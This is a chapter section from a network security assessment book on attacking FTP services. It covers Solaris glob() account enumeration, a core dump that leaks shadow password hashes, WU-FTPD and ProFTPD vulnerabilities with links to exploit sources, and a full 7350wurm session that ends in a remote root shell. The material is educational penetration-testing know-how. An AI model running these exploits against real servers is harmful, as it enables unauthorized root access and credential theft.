8.6 FTP Process Manipulation Attacks


If an attacker can accurately identify the target FTP service and the operating platform and architecture of the target server, it is relatively straightforward to identify and launch process-manipulation attacks to gain access to the server.

Most serious remote buffer overflows in FTP services are post-authentication issues; they require authenticated access to the FTP service and its underlying commands. Increasingly, write access is also required to create complex directory structures server-side that allow exploitation.

8.6.1 Solaris and BSD FTP Globbing Issues

The following glob( ) bug is present in default Solaris installations up to Solaris 8. By issuing a series of CWD ~username requests, an attacker can effectively enumerate valid user accounts without even logging into the FTP server. This issue is described in detail at http://www.iss.net/security_center/static/6332.php and demonstrated in Example 8-6.

Example 8-6. Exploiting Solaris FTP glob( ) issues remotely
# telnet 192.168.0.12 21 Trying 192.168.0.12... Connected to 192.168.0.12. Escape character is '^]'. 220 lackie FTP server (SunOS 5.8) ready. CWD ~blah 530 Please login with USER and PASS. 550 Unknown user name after ~ CWD ~test 530 Please login with USER and PASS. 550 Unknown user name after ~ CWD ~chris 530 Please login with USER and PASS. QUIT 221 Goodbye. Connection closed by foreign host.

In the example, blah and test users don't exist, but chris does. A similar postauthentication glob( ) bug can be exploited, which result in a heap overflow. Example 8-7 details how local users can easily abuse this vulnerability, resulting in a core dump containing encrypted user passwords from the /etc/shadow file. These two issues are referenced within the MITRE CVE list as CVE-2001-0421.

Example 8-7. Exploiting Solaris FTP glob( ) issues locally
$ telnet localhost 21 Trying 127.0.0.1...  Connected to localhost.  Escape character is '^]'.  220 cookiemonster FTP server (SunOS 5.6) ready.  user chris 331 Password required for chris. pass blahblah 530 Login incorrect.  CWD ~ 530 Please login with USER and PASS.  Connection closed by foreign host.  $ ls -la /core  -rw-r--r-- 1 root root 284304 Apr 16 10:20 /core  $ strings /core | grep :: daemon:NP:6445:::::: bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445:::::: listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445:::::: nobody4:NP:6445:::::: chris:XEC/9QJZ4nSn2:12040:::::: sshd:*LK*:::::::

No public preauthentication exploits have been released to compromise Solaris hosts by abusing glob( ) issues. Theoretically, the service can be exploited under Solaris if write access to the filesystem is permitted through FTP (see CVE-2001-0249), although this may be difficult to exploit under Solaris.

The glob( ) function called by FTP is also vulnerable to attack under BSD-derived systems (NetBSD, OpenBSD, and FreeBSD) due to the way heap memory is managed. An exploit script for this issue is available at http://www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.

8.6.2 WU-FTPD Vulnerabilities

WU-FTPD is a popular and easy-to-manage FTP service that many system administrators run across multiple Unix-like platforms (primarily Linux). Here, I present a breakdown of recent serious remotely exploitable (omitting denial-of-service or locally exploitable issues) vulnerabilities in various versions of WU-FTP, with details of working exploit scripts. For the latest details of bugs in this software, Be sure to heck the MITRE CVE and ISS X-Force databases at http://cve.mitre.org and http://xforce.iss.net, respectively.


WU-FTPD 2.4.2 BETA 18

By creating a complex directory structure and issuing a DELE command, a stack overflow occurs. An exploit is available for Linux targets at http://examples.oreilly.com/networksa/tools/w00f.c, and further information is available at http://xforce.iss.net/xforce/xfdb/1728.


WU-FTPD 2.5.0

This is exploitable by creating a complex directory structure and issuing a series of CWD commands, resulting in a stack overflow. An exploit is available for Linux targets at http://examples.oreilly.com/networksa/tools/ifafoffuffoffaf.c, and further information is available at http://xforce.iss.net/xforce/xfdb/3158.


WU-FTPD 2.6.0

This is exploitable by issuing a crafted SITE EXEC command on the FTP server, resulting in the exploitation of a format string bug. Various scripts exist to exploit this under FreeBSD and various Linux distributions, of which a favorite of mine is http://examples.oreilly.com/networksa/tools/wuftp-god.c. Background information is available at http://xforce.iss.net/xforce/xfdb/4773.


WU-FTPD 2.6.1

By issuing a series of RNFR and CWD ~{ commands to the FTP service, a heap overflow occurs through the glob( ) function. TESO released the excellent 7350wurm exploit script to compromise various Linux distributions, available at http://examples.oreilly.com/networksa/tools/7350wurm.c. Further information is available at http://xforce.iss.net/xforce/xfdb/7611.


WU-FTPD 2.6.2

The realpath( ) function within WU-FTP contains an off-by-one bug, which you can exploit by issuing a number of FTP commands (including STOR, RETR, MKD, and RMD). An exploit that compromises various Linux distributions is available at http://examples.oreilly.com/networksa/tools/0x82-wu262.c. You should check MITRE CVE at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0466 for information because the ISS X-Force web site doesn't list any details for this issue at the time of writing.

8.6.2.1 Exploiting WU-FTPD 2.6.1 on Linux with 7350wurm

The 7350wurm exploit can root most Linux WU-FTPD services through its in-built list of targets. The usage of the tool is shown in Example 8-8.

Example 8-8. 7350wurm usage
# 7350wurm 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]         [-t <num>] [-u <user>] [-p <pass>] [-d host]         [-L <retloc>] [-A <retaddr>] -h      this help -v      be verbose (default: off, twice for greater effect) -a      AUTO mode (target from banner) -D      DEBUG mode (waits for keypresses) -m      enable mass mode (use with care) -t num  choose target (0 for list, try -v or -v -v) -u user username to login to FTP (default: "ftp") -p pass password to use (default: "mozilla@") -d dest IP address or fqhn to connect to (default: 127.0.0.1) -L loc  override target-supplied retloc (format: 0xdeadbeef) -A addr override target-supplied retaddr (format: 0xcafebabe)

One excellent trick that 7350wurm has up its sleeve is that it can exploit a large number of WU-FTPD servers found running out-of-the-box on Linux hosts, reflected in Example 8-9.

Example 8-9. The 7350wurm target list
# 7350wurm -t0 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). num . description ----+-------------------------------------------------------   1 | Caldera 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]   2 | Debian potato [wu-ftpd_2.6.0-3.deb]   3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]   4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]   5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]   6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]   7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]   8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.rpm]   9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]  10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]  11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]  12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]  13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]  14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]  15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]  16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]  17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]  18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]  19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]  20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]  21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]  22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]  23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]  24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]  25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]  26 | SuSE 7.0 [wuftpd.rpm]  27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]  28 | SuSE 7.1 [wuftpd.rpm]  29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]  30 | SuSE 7.2 [wuftpd.rpm]  31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]  32 | SuSE 7.3 [wuftpd.rpm]  33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]  34 | Slackware 7.1

7350wurm can be run easily with the -a flag, grabbing the banner of the target FTP server and selecting the correct offsets from its target list, shown in Example 8-10.

Example 8-10. wurm running in automatic mode
# 7350wurm -a -d 192.168.0.25 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) team teso (thx bnuts, tomas, synnergy.net !). # trying to log in with (ftp/mozilla@) ... connected. # banner: 220 ftpsrv FTP server (Version wu-2.6.1-18) ready.   ### TARGET: RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]   # 1. filling memory gaps # 2. sending bigbuf + fakechunk      building chunk: ([0x08072c30] = 0x08085ab8) in 238 bytes # 3. triggering free(globlist[1]) # # exploitation succeeded. sending real shellcode # sending setreuid/chroot/execve shellcode # spawning shell ################################################################## uid=0(root) gid=0(root) groups=50(ftp) Linux ftpsrv 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown

8.6.3 ProFTPD Vulnerabilities

ProFTPD is similar to WU-FTPD in that it can be run from multiple operating platforms. I often see ProFTPD running on FreeBSD and Slackware Linux in the wild. Table 8-3 lists recent serious remotely exploitable issues in ProFTPD as listed in the MITRE CVE at the time of writing.

Table 8-3. Remotely exploitable ProFTPD vulnerabilities

CVE name

Date

Notes

CAN-1999-0911

27/08/1999

ProFTPD 1.2.0pre5 and prior MKD and CWD nested directory stack overflow.

CAN-2000-0574

06/07/2000

ProFTPD prior to 1.2.0rc2 contains multiple format string vulnerabilities that can be exploited remotely.

CAN-2003-0831

23/09/2003

ProFTPD 1.2.7 to 1.2.9rc2 ASCII transfer mode newline character overflow.

Public exploit code for two of the CVE candidate references listed in Table 8-3 can be found in the Packet Storm archives.

CAN-1999-0911, MKD and CWD stack overflow can be found at the following:

http://packetstormsecurity.org/groups/teso/pro.tar.gz
http://packetstormsecurity.org/advisories/b0f/proftpd.c
http://packetstormsecurity.org/0007-exploits/proftpX.c

CAN-2003-0831, ASCII transfer mode newline character overflow can be found at http://packetstormsecurity.org/0310-exploits/proftpdr00t.c.

8.6.4 Microsoft IIS FTP Server

At the time of writing, the only serious vulnerabilities that threaten Microsoft IIS FTP services are denial-of-service issues, usually exploitable through an authenticated FTP session. Two remotely exploitable security issues in the IIS 4.0 and 5.0 FTP services are listed within MITRE CVE as CVE-2001-0335 and CVE-1999-0777; both are medium-risk issues relating to information leakage from the service.

A common oversight is for system administrators to set up Internet-based IIS FTP servers and leave anonymous guest access to the server enabled.I have seen such open servers used as public storage and distribution centers for pirated software and other material.



Network Security Assessment
Network Security Assessment: Know Your Network
ISBN: 059600611X
EAN: 2147483647
Year: 2006
Pages: 166
Authors: Chris McNab

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net